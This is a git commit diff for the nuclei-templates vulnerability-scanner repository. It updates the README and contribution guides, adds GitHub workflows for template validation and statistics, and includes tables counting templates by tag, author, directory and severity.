patch-1
sandeep 2021-08-08 01:13:41 +05:30
commit 5767a0d5a2
1387 changed files with 144086 additions and 59978 deletions

View File

@ -3,7 +3,7 @@ f"""
<h1 align="center">
Nuclei Templates
</h1>
<h4 align="center">Community curated list of templates for the nuclei engine to find a security vulnerability in application.</h4>
<h4 align="center">Community curated list of templates for the nuclei engine to find security vulnerabilities in applications.</h4>
<p align="center">
@ -18,30 +18,27 @@ Nuclei Templates
<a href="#-contributions">Contributions</a> •
<a href="#-discussion">Discussion</a> •
<a href="#-community">Community</a> •
<a href="https://discord.gg/KECAGdH">Join Discord</a>
<a href="https://nuclei.projectdiscovery.io/faq/templates/">FAQs</a> •
<a href="https://discord.gg/projectdiscovery">Join Discord</a>
</p>
----
Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine.
This repository stores and houses various templates for the scanner provided by our team, as well as contributed by the community.
We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list.
## Nuclei Templates overview
An overview of the nuclei template directory including number of templates associated with each directory.
An overview of the nuclei template project, including statistics on unique tags, author, directory, severity, and type of templates. The table below contains the top ten statistics for each matrix; an expanded version of this is [available here](TEMPLATES-STATS.md), and also available in [JSON](TEMPLATES-STATS.json) format for integration.
<table>
<tr>
<td>
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | {countTpl("cves/*")} | vulnerabilities | {countTpl("vulnerabilities/*")} | exposed-panels | {countTpl("exposed-panels")} |
| takeovers | {countTpl("takeovers")} | exposures | {countTpl("exposures/*")} | technologies | {countTpl("technologies")} |
| misconfiguration | {countTpl("misconfiguration")} | workflows | {countTpl("workflows")} | miscellaneous | {countTpl("miscellaneous")} |
| default-logins | {countTpl("default-logins/*")} | exposed-tokens | {countTpl("exposed-tokens/*")} | dns | {countTpl("dns")} |
| fuzzing | {countTpl("fuzzing")} | helpers | {countTpl("helpers/*")} | iot | {countTpl("iot")} |
{get_top10()}
**{command("tree", -2, None)}**.
@ -49,34 +46,34 @@ An overview of the nuclei template directory including number of templates assoc
</tr>
</table>
📖 Documentation
-----
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding.
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates.
We have also added a set of templates to help you understand how things work.
💪 Contributions
-----
Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
Nuclei-templates is powered by major contributions from the community.
[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
💬 Discussion
-----
Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
Have questions / doubts / ideas to discuss?
Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
👨‍💻 Community
-----
You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
You are welcome to join our [Discord Community](https://discord.gg/KECAGdH).
You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
💡 Notes
-----
- Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests.
Thanks again for your contribution and keeping the community vibrant. :heart:
"""
Thanks again for your contribution and keeping this community vibrant. :heart:
"""

View File

@ -8,6 +8,11 @@ def countTpl(path):
def command(args, start=None, end=None):
return "\n".join(subprocess.run(args, text=True, capture_output=True).stdout.split("\n")[start:end])[:-1]
def get_top10():
HEADER = "## Nuclei Templates Top 10 statistics\n\n"
TOP10 = command(["cat", "TOP-10.md"])
return HEADER + TOP10 if len(TOP10) > 0 else ""
if __name__ == "__main__":
version = command(["git", "describe", "--tags", "--abbrev=0"])
template = eval(open(".github/scripts/README.tmpl", "r").read())

View File

@ -1,4 +1,4 @@
name: syntax-checking
name: ❄️ YAML Lint
on: [push, pull_request]

35
.github/workflows/template-validate.yml vendored Normal file
View File

@ -0,0 +1,35 @@
name: 🛠 Template Validate
on: [push, pull_request]
jobs:
build:
runs-on: ubuntu-latest
steps:
- name: Checkout Repo
uses: actions/checkout@master
- name: Setup golang
uses: actions/setup-go@v2
with:
go-version: 1.14
- name: Cache Go
id: cache-go
uses: actions/cache@v2
with:
path: /home/runner/go
key: ${{ runner.os }}-go
- name: Installing Nuclei
if: steps.cache-go.outputs.cache-hit != 'true'
env:
GO111MODULE: on
run: |
go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev
shell: bash
- name: Template Validation
run: |
nuclei -validate -t . -exclude .pre-commit-config.yaml
shell: bash

63
.github/workflows/templates-stats.yml vendored Normal file
View File

@ -0,0 +1,63 @@
name: 🗒 Templates Stats
on:
create:
tags:
- v*
workflow_dispatch:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master'
steps:
- name: Checkout Repo
uses: actions/checkout@master
with:
fetch-depth: 0
- name: Setup golang
uses: actions/setup-go@v2
with:
go-version: 1.14
- name: Installing Template Stats
env:
GO111MODULE: on
run: |
go get -v github.com/projectdiscovery/templates-stats
shell: bash
- name: Markdown Stats
run: |
templates-stats -output TEMPLATES-STATS.md -path /home/runner/work/nuclei-templates/nuclei-templates/
shell: bash
- name: JSON Stats
run: |
templates-stats -output TEMPLATES-STATS.json -json -path /home/runner/work/nuclei-templates/nuclei-templates/
shell: bash
- name: Top 10 Stats
run: |
templates-stats -output TOP-10.md -top 10 -path /home/runner/work/nuclei-templates/nuclei-templates/
shell: bash
- name: Get statistical changes
id: stats
run: echo "::set-output name=changes::$(git status -s | wc -l)"
- name: Commit files
if: steps.stats.outputs.changes > 0
run: |
git add TEMPLATES-STATS.*
git add TOP-10.md
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git commit -m "Auto Generated Templates Stats [$(date)] :robot:" -a
- name: Push changes
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}

View File

@ -1,12 +1,10 @@
name: "Auto Update README"
name: 📝 Readme Update
on:
push:
branches:
- master
create:
tags:
- v*
workflow_dispatch:
jobs:
build:

View File

@ -8,11 +8,9 @@
# unless asked for by the user.
tags:
- "headless"
- "dos"
- "iot"
- "misc"
- "fuzz"
- "dos"
- "misc"
# files is a list of files to ignore template execution
# unless asked for by the user.

100
CONTRIBUTING.md Normal file
View File

@ -0,0 +1,100 @@
# Template Contribution Guidelines
This documentation contains a set of guidelines to help you during the contribution process.
We are happy to welcome all the contributions from anyone willing to **improve/add** new **templates** to this project.
Thank you for helping out and remember, **no contribution is too small.**
# Submitting Nuclei Templates 👩‍💻👨‍💻
Below you will find the process and workflow used to review and merge your changes.
## Step 1 : Find existing templates
- Take a look at the [Existing Templates](https://github.com/projectdiscovery/nuclei-templates) before creating new one.
- Take a look at Existing Templates in [GitHub Issues](https://github.com/projectdiscovery/nuclei-templates/issues) and [Pull Request](https://github.com/projectdiscovery/nuclei-templates/pulls) section to avoid duplicate work.
- Take a look at [Templates](https://nuclei.projectdiscovery.io/templating-guide/) and [Matchers](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers) Guideline for creating new template.
## Step 2 : Fork the Project
- Fork this Repository. This will create a Local Copy of this Repository on your Github Profile. Keep a reference to the original project in `upstream` remote.
<img width="928" alt="template-fork" src="https://user-images.githubusercontent.com/8293321/124467966-2afde200-ddb6-11eb-835f-8f8fc2fabedb.png">
```sh
git clone https://github.com/<your-username>/nuclei-templates
cd nuclei-templates
git remote add upstream https://github.com/projectdiscovery/nuclei-templates
```
- If you have already forked the project, update your copy before working.
```sh
git remote update
git checkout master
git rebase upstream/master
```
## Step 3 : Create your Template Branch
Create a new branch. Use its name to identify the issue your addressing.
```sh
# It will create a new branch with name template_branch_name and switch to that branch
git checkout -b template_branch_name
```
## Step 4 : Create Template and Commit
- Create your template.
- Add all the files/folders needed.
- After you've made changes or completed template creation, add changes to the branch you've just created by:
```sh
# To add all new files to branch template_branch_name
git add .
```
- To commit give a descriptive message for the convenience of reveiwer by:
```sh
# This message get associated with all files you have changed
git commit -m "Added/Fixed/Updated XXX Template"
```
**NOTE**:
- A Pull Request should have only one unique template to make it simple for review.
- Multiple templates for same technology can be grouped into single Pull Request.
## Step 5 : Push Your Changes
- Now you are ready to push your template to the remote (forked) repository.
- When your work is ready and complies with the project conventions, upload your changes to your fork:
```sh
# To push your work to your remote repository
git push -u origin template_branch_name
```
## Step 6 : Pull Request
- Fire up your favorite browser, navigate to your GitHub repository, then click on the New pull request button within the Pull requests tab. Provide a meaningful name and description to your pull request, that describes the purpose of the template.
- Voila! Your Pull Request has been submitted. It will be reviewed and merged by the moderators, if it complies with project standards, otherwise a feedback will be provided.🥳
## Need more help?🤔
You can refer to the following articles of Git and GitHub basics. In case you are stuck, feel free to contact the Project Mentors and Community by joining [PD Community](https://discord.gg/projectdiscovery) Discord server.
- [Forking a Repo](https://help.github.com/en/github/getting-started-with-github/fork-a-repo)
- [Cloning a Repo](https://help.github.com/en/desktop/contributing-to-projects/creating-an-issue-or-pull-request)
- [How to create a Pull Request](https://opensource.com/article/19/7/create-pull-request-github)
- [Getting started with Git and GitHub](https://towardsdatascience.com/getting-started-with-git-and-github-6fcd0f2d4ac6)
- [Learn GitHub from Scratch](https://lab.github.com/githubtraining/introduction-to-github)
## Tip from us😇
- **Nuclei** outcomes are only as excellent as **template matchers💡**
- Declare at least two matchers to reduce false positive
- Avoid matching words reflected in the URL to reduce false positive
- Avoid short word that could be encountered anywhere

28
PULL_REQUEST_TEMPLATE.md Normal file
View File

@ -0,0 +1,28 @@
### Template / PR Information
<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->
- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:
### Template Validation
I've validated this template locally?
- [ ] YES
- [ ] NO
#### Additional Details (leave it blank if not applicable)
<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->
### Additional References:
- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)

View File

@ -3,7 +3,7 @@
<h1 align="center">
Nuclei Templates
</h1>
<h4 align="center">Community curated list of templates for the nuclei engine to find a security vulnerability in application.</h4>
<h4 align="center">Community curated list of templates for the nuclei engine to find security vulnerabilities in applications.</h4>
<p align="center">
@ -18,64 +18,74 @@ Nuclei Templates
<a href="#-contributions">Contributions</a>
<a href="#-discussion">Discussion</a>
<a href="#-community">Community</a>
<a href="https://discord.gg/KECAGdH">Join Discord</a>
<a href="https://nuclei.projectdiscovery.io/faq/templates/">FAQs</a>
<a href="https://discord.gg/projectdiscovery">Join Discord</a>
</p>
----
Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine.
This repository stores and houses various templates for the scanner provided by our team, as well as contributed by the community.
We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list.
## Nuclei Templates overview
An overview of the nuclei template directory including number of templates associated with each directory.
An overview of the nuclei template project, including statistics on unique tags, author, directory, severity, and type of templates. The table below contains the top ten statistics for each matrix; an expanded version of this is [available here](TEMPLATES-STATS.md), and also available in [JSON](TEMPLATES-STATS.json) format for integration.
<table>
<tr>
<td>
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 266 | vulnerabilities | 120 | exposed-panels | 117 |
| takeovers | 67 | exposures | 66 | technologies | 60 |
| misconfiguration | 55 | workflows | 27 | miscellaneous | 20 |
| default-logins | 21 | exposed-tokens | 9 | dns | 8 |
| fuzzing | 7 | helpers | 6 | iot | 11 |
## Nuclei Templates Top 10 statistics
**82 directories, 892 files**.
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 547 | dhiyaneshdk | 232 | cves | 554 | info | 569 | http | 1646 |
| panel | 213 | pikpikcu | 225 | vulnerabilities | 252 | high | 441 | file | 44 |
| xss | 202 | pdteam | 189 | exposed-panels | 215 | medium | 371 | network | 35 |
| wordpress | 189 | dwisiswant0 | 126 | exposures | 170 | critical | 210 | dns | 11 |
| rce | 181 | geeknik | 122 | technologies | 156 | low | 150 | | |
| exposure | 180 | daffainfo | 114 | misconfiguration | 119 | | | | |
| lfi | 155 | madrobot | 60 | takeovers | 70 | | | | |
| cve2020 | 153 | gy741 | 54 | default-logins | 49 | | | | |
| wp-plugin | 127 | princechaddha | 53 | file | 44 | | | | |
| tech | 97 | gaurang | 42 | workflows | 34 | | | | |
**139 directories, 1792 files**.
</td>
</tr>
</table>
📖 Documentation
-----
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding.
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates.
We have also added a set of templates to help you understand how things work.
💪 Contributions
-----
Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
Nuclei-templates is powered by major contributions from the community.
[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
💬 Discussion
-----
Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
Have questions / doubts / ideas to discuss?
Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
👨‍💻 Community
-----
You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
You are welcome to join our [Discord Community](https://discord.gg/KECAGdH).
You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
💡 Notes
-----
- Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests.
Thanks again for your contribution and keeping the community vibrant. :heart:
Thanks again for your contribution and keeping this community vibrant. :heart:

1
TEMPLATES-STATS.json Normal file

File diff suppressed because one or more lines are too long

684
TEMPLATES-STATS.md Normal file
View File

@ -0,0 +1,684 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|--------------------|-------|--------------------------------------------|-------|-------------------------|-------|----------|-------|---------|-------|
| cve | 547 | dhiyaneshdk | 232 | cves | 554 | info | 569 | http | 1646 |
| panel | 213 | pikpikcu | 225 | vulnerabilities | 252 | high | 441 | file | 44 |
| xss | 202 | pdteam | 189 | exposed-panels | 215 | medium | 371 | network | 35 |
| wordpress | 189 | dwisiswant0 | 126 | exposures | 170 | critical | 210 | dns | 11 |
| rce | 181 | geeknik | 122 | technologies | 156 | low | 150 | | |
| exposure | 180 | daffainfo | 114 | misconfiguration | 119 | | | | |
| lfi | 155 | madrobot | 60 | takeovers | 70 | | | | |
| cve2020 | 153 | gy741 | 54 | default-logins | 49 | | | | |
| wp-plugin | 127 | princechaddha | 53 | file | 44 | | | | |
| tech | 97 | gaurang | 42 | workflows | 34 | | | | |
| config | 90 | pussycat0x | 36 | miscellaneous | 27 | | | | |
| cve2021 | 88 | ice3man | 26 | network | 27 | | | | |
| cve2019 | 84 | organiccrap | 24 | iot | 23 | | | | |
| takeover | 72 | 0x_akoko | 20 | dns | 11 | | | | |
| cve2018 | 69 | philippedelteil | 16 | fuzzing | 10 | | | | |
| | 66 | sheikhrishad | 15 | cnvd | 9 | | | | |
| token | 64 | milo2012 | 14 | headless | 5 | | | | |
| apache | 62 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | |
| default-login | 51 | techbrunchfr | 13 | | | | | | |
| cve2017 | 45 | suman_kar | 12 | | | | | | |
| file | 44 | cyllective | 11 | | | | | | |
| iot | 44 | righettod | 10 | | | | | | |
| unauth | 42 | random_robbie | 10 | | | | | | |
| oob | 35 | hackergautam | 9 | | | | | | |
| network | 35 | wdahlenb | 9 | | | | | | |
| sqli | 34 | melbadry9 | 8 | | | | | | |
| oracle | 29 | that_juan_ | 8 | | | | | | |
| workflow | 29 | aashiq | 8 | | | | | | |
| logs | 29 | iamthefrogy | 8 | | | | | | |
| ssrf | 28 | r3dg33k | 8 | | | | | | |
| cve2016 | 27 | nadino | 8 | | | | | | |
| misc | 27 | harshbothra_ | 7 | | | | | | |
| jira | 26 | 0x240x23elu | 7 | | | | | | |
| atlassian | 26 | emadshanab | 7 | | | | | | |
| disclosure | 25 | techryptic (@tech) | 7 | | | | | | |
| listing | 24 | randomstr1ng | 7 | | | | | | |
| redirect | 21 | dr_set | 7 | | | | | | |
| aem | 19 | oppsec | 7 | | | | | | |
| cisco | 18 | kophjager007 | 7 | | | | | | |
| sap | 16 | __fazal | 6 | | | | | | |
| cve2015 | 16 | caspergn | 6 | | | | | | |
| debug | 14 | puzzlepeaches | 6 | | | | | | |
| cve2012 | 14 | iamnoooob | 5 | | | | | | |
| cve2014 | 13 | ganofins | 5 | | | | | | |
| auth-bypass | 13 | panch0r3d | 5 | | | | | | |
| struts | 13 | joanbono | 5 | | | | | | |
| android | 13 | yanyun | 5 | | | | | | |
| misconfig | 13 | pentest_swissky | 5 | | | | | | |
| fuzz | 13 | rootxharsh | 5 | | | | | | |
| adobe | 12 | xelkomy | 4 | | | | | | |
| jenkins | 12 | elsfa7110 | 4 | | | | | | |
| cve2011 | 12 | meme-lord | 4 | | | | | | |
| dns | 12 | github.com/its0x08 | 4 | | | | | | |
| weblogic | 12 | nodauf | 4 | | | | | | |
| devops | 11 | e_schultze_ | 4 | | | | | | |
| zoho | 11 | fyoorer | 3 | | | | | | |
| dlink | 11 | shifacyclewala | 3 | | | | | | |
| router | 11 | dudez | 3 | | | | | | |
| springboot | 11 | f1tz | 3 | | | | | | |
| cve2013 | 10 | mavericknerd | 3 | | | | | | |
| php | 10 | thomas_from_offensity | 3 | | | | | | |
| magento | 9 | vsh00t | 3 | | | | | | |
| ftp | 8 | impramodsargar | 3 | | | | | | |
| gitlab | 8 | z3bd | 3 | | | | | | |
| aws | 8 | shine | 3 | | | | | | |
| rails | 8 | jarijaas | 3 | | | | | | |
| airflow | 8 | 0w4ys | 3 | | | | | | |
| cnvd | 8 | binaryfigments | 3 | | | | | | |
| scada | 7 | tess | 3 | | | | | | |
| cve2009 | 7 | _generic_human_ | 3 | | | | | | |
| joomla | 7 | yash anand @yashanand155 | 3 | | | | | | |
| nginx | 7 | emenalf | 2 | | | | | | |
| xxe | 7 | random-robbie | 2 | | | | | | |
| vmware | 7 | lotusdll | 2 | | | | | | |
| login | 7 | hetroublemakr | 2 | | | | | | |
| coldfusion | 6 | unstabl3 | 2 | | | | | | |
| google | 6 | koti2 | 2 | | | | | | |
| jetty | 6 | bp0lr | 2 | | | | | | |
| cms | 6 | moritz nentwig | 2 | | | | | | |
| backup | 6 | vavkamil | 2 | | | | | | |
| citrix | 6 | manas_harsh | 2 | | | | | | |
| api | 6 | amsda | 2 | | | | | | |
| rconfig | 6 | nkxxkn | 2 | | | | | | |
| dell | 6 | dheerajmadhukar | 2 | | | | | | |
| drupal | 5 | pxmme1337 | 2 | | | | | | |
| phpmyadmin | 5 | udit_thakkur | 2 | | | | | | |
| dedecms | 5 | 0xprial | 2 | | | | | | |
| lucee | 5 | ehsahil | 2 | | | | | | |
| solr | 5 | incogbyte | 2 | | | | | | |
| files | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | |
| ibm | 5 | lu4nx | 2 | | | | | | |
| django | 5 | w4cky_ | 2 | | | | | | |
| circarlife | 5 | hahwul | 2 | | | | | | |
| confluence | 5 | 0xsapra | 2 | | | | | | |
| netgear | 5 | bing0o | 2 | | | | | | |
| fileupload | 5 | davidmckennirey | 2 | | | | | | |
| ssti | 5 | ree4pwn | 2 | | | | | | |
| headless | 5 | swissky | 2 | | | | | | |
| iis | 5 | 0xrudra | 2 | | | | | | |
| laravel | 5 | gevakun | 2 | | | | | | |
| ruijie | 5 | randomrobbie | 2 | | | | | | |
| java | 5 | alifathi-h1 | 2 | | | | | | |
| webserver | 4 | 0xelkomy | 2 | | | | | | |
| docker | 4 | zomsop82 | 2 | | | | | | |
| thinkcmf | 4 | bsysop | 2 | | | | | | |
| deserialization | 4 | 0xcrypto | 2 | | | | | | |
| elastic | 4 | joeldeleep | 2 | | | | | | |
| nodejs | 4 | kiblyn11 | 2 | | | | | | |
| artifactory | 4 | afaq | 2 | | | | | | |
| vpn | 4 | fabaff | 2 | | | | | | |
| thinkphp | 4 | x1m_martijn | 2 | | | | | | |
| asp | 4 | foulenzer | 2 | | | | | | |
| tomcat | 4 | ooooooo_q | 1 | | | | | | |
| solarwinds | 4 | yashgoti | 1 | | | | | | |
| moodle | 4 | _darrenmartyn | 1 | | | | | | |
| jolokia | 4 | knassar702 | 1 | | | | | | |
| traversal | 4 | nytr0gen | 1 | | | | | | |
| samsung | 4 | toufik airane | 1 | | | | | | |
| crlf | 4 | kabirsuda | 1 | | | | | | |
| magmi | 4 | me9187 | 1 | | | | | | |
| hongdian | 4 | huowuzhao | 1 | | | | | | |
| nacos | 3 | th3.d1p4k | 1 | | | | | | |
| bitrix | 3 | bjhulst | 1 | | | | | | |
| oa | 3 | 0h1in9e | 1 | | | | | | |
| targa | 3 | d0rkerdevil | 1 | | | | | | |
| openssh | 3 | philippdelteil | 1 | | | | | | |
| tikiwiki | 3 | raesene | 1 | | | | | | |
| r-seenet | 3 | ohlinge | 1 | | | | | | |
| grafana | 3 | remonsec | 1 | | | | | | |
| terramaster | 3 | makyotox | 1 | | | | | | |
| windows | 3 | qlkwej | 1 | | | | | | |
| lfr | 3 | gal nagli | 1 | | | | | | |
| microstrategy | 3 | pdp | 1 | | | | | | |
| amazon | 3 | ringo | 1 | | | | | | |
| nosqli | 3 | johnk3r | 1 | | | | | | |
| ofbiz | 3 | kurohost | 1 | | | | | | |
| printer | 3 | jeya seelan | 1 | | | | | | |
| log | 3 | shifacyclewla | 1 | | | | | | |
| vbulletin | 3 | j33n1k4 | 1 | | | | | | |
| mongodb | 3 | notsoevilweasel | 1 | | | | | | |
| ebs | 3 | pudsec | 1 | | | | | | |
| hp | 3 | whynotke | 1 | | | | | | |
| cve2010 | 3 | ratnadip gajbhiye | 1 | | | | | | |
| kubernetes | 3 | naglinagli | 1 | | | | | | |
| git | 3 | akash.c | 1 | | | | | | |
| slack | 3 | blckraven | 1 | | | | | | |
| itop | 3 | alex | 1 | | | | | | |
| resin | 3 | luskabol | 1 | | | | | | |
| ssh | 3 | ahmed sherif | 1 | | | | | | |
| backups | 3 | @github.com/defr0ggy | 1 | | | | | | |
| zabbix | 3 | shreyapohekar | 1 | | | | | | |
| bypass | 3 | aceseven (digisec360) | 1 | | | | | | |
| kafka | 3 | sushant kamble | 1 | | | | | | |
| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | |
| zhiyuan | 3 | thezakman | 1 | | | | | | |
| springcloud | 3 | streetofhackerr007 (rohit | 1 | | | | | | |
| | | soni) | | | | | | | |
| fanruan | 3 | regala_ | 1 | | | | | | |
| fpd | 3 | j3ssie/geraldino2 | 1 | | | | | | |
| caucho | 3 | thevillagehacker | 1 | | | | | | |
| prometheus | 2 | juicypotato1 | 1 | | | | | | |
| nextjs | 2 | jteles | 1 | | | | | | |
| sonarqube | 2 | rojanrijal | 1 | | | | | | |
| jsf | 2 | berkdusunur | 1 | | | | | | |
| openfire | 2 | 52971 | 1 | | | | | | |
| waf | 2 | gboddin | 1 | | | | | | |
| kibana | 2 | ldionmarcil | 1 | | | | | | |
| hpe | 2 | sshell | 1 | | | | | | |
| akamai | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | |
| xxljob | 2 | johnjhacking | 1 | | | | | | |
| paloalto | 2 | idealphase | 1 | | | | | | |
| grav | 2 | s1r1u5_ | 1 | | | | | | |
| microsoft | 2 | cookiehanhoan | 1 | | | | | | |
| shellshock | 2 | udyz | 1 | | | | | | |
| sharepoint | 2 | rtcms | 1 | | | | | | |
| mail | 2 | elmahdi | 1 | | | | | | |
| seeyon | 2 | b4uh0lz | 1 | | | | | | |
| dos | 2 | taielab | 1 | | | | | | |
| idrac | 2 | yashanand155 | 1 | | | | | | |
| vrealize | 2 | zhenwarx | 1 | | | | | | |
| emerge | 2 | alph4byt3 | 1 | | | | | | |
| globalprotect | 2 | _harleo | 1 | | | | | | |
| linkerd | 2 | kishore krishna (sillydaddy) | 1 | | | | | | |
| cve2008 | 2 | fopina | 1 | | | | | | |
| rockmongo | 2 | schniggie | 1 | | | | | | |
| voipmonitor | 2 | kareemse1im | 1 | | | | | | |
| icewarp | 2 | retr0 | 1 | | | | | | |
| keycloak | 2 | bad5ect0r | 1 | | | | | | |
| cache | 2 | flag007 | 1 | | | | | | |
| rstudio | 2 | noamrathaus | 1 | | | | | | |
| odoo | 2 | geraldino2 | 1 | | | | | | |
| yapi | 2 | andirrahmani1 | 1 | | | | | | |
| natshell | 2 | manuelbua | 1 | | | | | | |
| strapi | 2 | smaranchand | 1 | | | | | | |
| trixbox | 2 | arcc | 1 | | | | | | |
| jeedom | 2 | dawid czarnecki | 1 | | | | | | |
| leak | 2 | soyelmago | 1 | | | | | | |
| github | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | |
| mida | 2 | mhdsamx | 1 | | | | | | |
| akkadian | 2 | rodnt | 1 | | | | | | |
| kevinlab | 2 | un-fmunozs | 1 | | | | | | |
| splunk | 2 | micha3lb3n | 1 | | | | | | |
| horde | 2 | aaron_costello | 1 | | | | | | |
| | | (@conspiracyproof) | | | | | | | |
| chamilo | 2 | sickwell | 1 | | | | | | |
| kentico | 2 | apt-mirror | 1 | | | | | | |
| frp | 2 | vzamanillo | 1 | | | | | | |
| igs | 2 | @dwisiswant0 | 1 | | | | | | |
| openam | 2 | sullo | 1 | | | | | | |
| telerik | 2 | yavolo | 1 | | | | | | |
| smtp | 2 | bernardo rodrigues | 1 | | | | | | |
| | | @bernardofsr | andré monteiro | | | | | | | |
| | | @am0nt31r0 | | | | | | | |
| jellyfin | 2 | c3l3si4n | 1 | | | | | | |
| flir | 2 | hakluke | 1 | | | | | | |
| ucmdb | 2 | zandros0 | 1 | | | | | | |
| cve2007 | 2 | bernardofsr | 1 | | | | | | |
| injection | 2 | ajaysenr | 1 | | | | | | |
| plesk | 2 | elder tao | 1 | | | | | | |
| oauth | 2 | absshax | 1 | | | | | | |
| nexus | 2 | wabafet | 1 | | | | | | |
| phpcollab | 2 | affix | 1 | | | | | | |
| wordfence | 2 | 0xtavian | 1 | | | | | | |
| maian | 2 | furkansenan | 1 | | | | | | |
| httpd | 2 | iampritam | 1 | | | | | | |
